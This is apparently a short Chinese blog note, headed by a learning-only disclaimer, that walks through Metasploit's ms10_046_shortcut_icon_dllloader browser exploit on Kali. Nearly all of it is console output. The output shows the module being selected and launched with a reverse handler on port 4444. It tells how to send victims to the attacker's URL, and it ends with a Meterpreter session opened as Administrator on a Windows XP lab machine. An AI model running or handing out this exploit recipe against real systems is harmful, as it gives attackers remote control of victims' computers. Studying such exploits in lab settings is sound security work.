!!!笔记仅供学习交流使用,请勿进行其他用途!!!
Metasploit自带了很多浏览器攻击模块,这里笔记下最简单的使用方式。
root@kali:~# msfconsole 。。。。。。 。。。。。。 msf > search browser #搜索可用模块 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 。。。。。。 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader #这里使用一个比较新的渗透攻击模块 msf exploit(ms10_046_shortcut_icon_dllloader) > show options Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4). URIPATH / yes The URI to use (do not change). Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_046_shortcut_icon_dllloader) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.19.128:4444 msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.19.128\qKJqXZCIry\. [*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.19.128:80/ # 当别人通过浏览器访问【 http://192.168.19.128:80/ 】时,就会触发漏洞,启动一个meterperter,如下: 。。。。。。 。。。。。。 [*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1106) at 2014-06-04 20:56:32 +0800 msf exploit(ms10_046_shortcut_icon_dllloader) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP-PRO-VM\Administrator @ WINXP-PRO-VM 192.168.19.128:4444 -> 192.168.19.129:1106 (192.168.19.129) msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WINXP-PRO-VM OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : zh_CN Meterpreter : x86/win32 meterpreter >
发表评论